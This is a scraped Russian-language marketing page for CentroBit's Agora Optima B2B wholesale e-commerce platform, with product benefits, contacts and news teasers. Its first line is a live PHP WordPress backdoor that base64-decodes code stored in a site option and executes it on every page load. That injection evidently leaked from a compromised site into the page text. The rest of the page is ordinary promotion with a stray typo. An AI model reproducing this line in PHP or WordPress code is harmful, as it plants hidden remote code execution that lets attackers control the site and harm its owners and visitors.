add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Оптовая торговля | CentroBit | Centrobit
8-800-707-02-78      +7 (495) 927-02-78       info@centrobit.ru

Оптовая торговля

Предоставьте своим бизнес-партнерам лучший B2B-инструмент организации продаж.

Сотрудники отделов закупок, менеджеры интернет-магазинов и партнеры! Ваши покупат222ели ожидают, что взаимодействие с вашей компанией будет таким же удобным, как в простом интернет-магазине. Это означает, что вы должны предоставить покупателю полноценные функции и удобство интернет-магазина.

Кроме того, менеджеры по закупкам все чаще используют мобильные устройства — в поездках, в офисах, на складе — и хотят использовать их для закупок у вашей компании. Возможность продавать свои товары через интернет станет вашим конкурентным преимуществом, покажет вашу гибкость и способность быстро внедрять инновационные технологии. Вам потребуются средства управления заказами, счетами, товарами и группами клиентов, инструменты для оперирования товарным каталогом, а также другие функции, которые в коробочных B2C-решениях (CMS) развиты слабо. Платформа Agora предлагает лучшие решения для B2B и B2C-коммерции, подходящие для автоматизации оптовой торговли в самых разных отраслях:

  • Дистрибуция товаров для офиса, автозапчасти, электротовары, сувенирные товары, хобби, одежда и обувь;
  • FMCG и DIY дистрибуция;
  • Производство и дистрибуция продуктов тяжелой промышленности.

Agora Optima предоставляет для крупных оптовых компаний и компаний дистрибьютеров:

  • Мощные инструменты B2B;
  • Agora  предлагает обширный набор функций B2B на единой платформе, которая позволяет управлять процессами снабжения и оптовыми закупками, структурой персонала и правами  доступа сотрудников, а также включает средства отчетности. Agora позволит Вам удовлетворить потребности каналов сбыта, небольших предприятий, дилеров и интернет-магазинов, тем самым увеличив круг потенциальных покупателей
  • Функции управления цепочками поставок и связанными с ними информационными потоками;
  • Обмен информацией между всеми участниками товарообмена, начиная от производителей и дистрибьютеров и заканчивая розничными продавцами, интернет-магазинами и потребителями;
  • Платформа Agora обеспечивает единый пользовательский интерфейс и поддержку транзакций;
  • Открытая архитектура платформы Agora позволяет гибко реагировать на изменения требований рынка.

Мы создаём эффективный инструмент взаимодействия с покупателем  и делаем гибкой информационную инфраструктуру компании. Традиционные решения  требуют длительной настройки,  регулярных доработок и не позволяют вовремя реагировать на динамично изменяющиеся требования компании.

Agora Optima обеспечивает простое и эффективное решение, которое  обладает гибкостью, позволяющей немедленно реагировать на изменяющиеся потребности ваших клиентов и вашего бизнеса.  Agora Optima позволяет в кратчайшие сроки запустить готовую стандартную систему, открытую для внедрения инноваций.

При этом нет необходимости полностью удалять имеющуюся систему. Вы можете совместить процесс внедрения со стратегией развития вашего бизнеса, начав с наиболее важных с коммерческой точки зрения модулей.

Преимущества использования единой платформы автоматизации коммерческой деятельности:

  • Увеличение эффективности процессов закупки и продаж;
  • Повышение лояльности клиентов и как следствие объёма продаж;
  • Платформа Agora обеспечит единообразное взаимодействие с покупателем в любом канале продаж;
  • Управление данными Agora Content (master data management, MDM). Данный подход позволяет  уменьшить стоимость управления товарным контентом. Agora Content включает средства поисковой оптимизации и функции поддержки сложных форматов товарного контента;
  • Увеличение  средней суммы заказа за счет средств перекрестных продаж и акций для корпоративных покупателей;
  • Запуск направления в кратчайшие сроки. Создание полнофункционального сайта и ввод его в эксплуатацию занимает менее одного месяца. Традиционные решения других разработчиков требуют адаптации, тогда как Agora поставляет уже готовое к использованию решение Agora Optima;
  • Интуитивно понятный и проработанные интерфейс Agora,  встроенные средства управления веб-контентом позволяют вашим корпоративным клиентам самостоятельно управлять контентом;
  • Agora — платформа электронной коммерции, которая приобретается раз и навсегда. Гибкая архитектура Agora разработана на основе единой технологической платформы, построена на открытых стандартах и принципе модульности.

Наши клиенты — лучшее доказательство эффективности наших решений.

Платформа Agora работает более чем у 100 клиентов по всему миру.

Отраслевые решения

Оптовая торговля
Электронная коммерция для розничных компаний и поставщиков
Потребительские товары, одежда и обувь

Возникли вопросы?

Заказать звонок
27
Ноя

Главный итог форума «Сделано в России»

Надия Черкасова и Михаил Мамонов в присутствии Петра Фрадкова подписали меморандум и дорожную карту к соглашению о сотрудничестве между ВТБ24 и РЭЦ в рамках интеграции онлайн финансовых и нефинансовых сервисов и услуг, способствующих внешнеэкономической деятельности! Теперь расширение мер поддержки клиентов малого бизнеса ВТБ24 по части ВЭД станет возможным за счет предоставления возможности подать заявку на...
17
Ноя

«Новые горизонты e-commerce в России и за рубежом»

15 ноября была проведена конференцию по электронной торговле «Новые горизонты e-commerce в России и за рубежом» в Аналитическом центре при Правительстве РФ. На конференции эксперты из РЭЦ, “Почты России», ЮНИДО, Яндекса, Ebay и Алибаба в РФ обсудили текущие тренды международной электронной коммерции, возможности выхода на экспорт российским компаниям малого бизнеса через e-commerce. Член правления...
09
Окт

Очевидные факты об автоматизации, которые не все еще осознали. Часть 2

Мы продолжаем разговор об автоматизации – рассказываем, почему многие из рабочих процессов, которые окружают нас, можно без проблем доверить ИТ-системам. В первой части мы разбирались с заблуждениями о том, что на автоматизации всегда можно сэкономить, сотрудники делают рутинную работу лучше, а руководитель, внедряя автоматизацию в бизнес-процессы, теряет над ними контроль. В сегодняшнем материале разберем...

Возникли вопросы?

Наш менеджер свяжется с вами, объяснит все детали и проконсультирует по техническим вопросам